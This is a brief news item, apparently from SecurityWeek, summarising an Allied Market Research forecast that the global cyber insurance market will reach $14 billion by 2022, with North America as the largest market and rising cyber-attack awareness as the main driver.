http://www.securityweek.com/cyber-insurance-market-top-14-billion-2022-report
The global cyber insurance market is expected to generate $14 billion by 2022, according to a new report published by Allied Market Research (AMR). That figure represents an impressive compound annual growth rate (CAGR) of nearly 28% from 2016 to 2022.
North America constituted the largest cyber insurance market share in 2015, which is expected to dominate the market during the forecast period.
“Increase in awareness about cyber risks from boardroom to data centers owing to the rising number of cyber-attacks in the past 2-3 years is the prime factor that drives the market,” the report explains. “However, complex and changing nature of cyber risks limits cyber insurance market growth. Low market penetration of cyber insurance policies in developing countries offers promising business opportunity for market players.”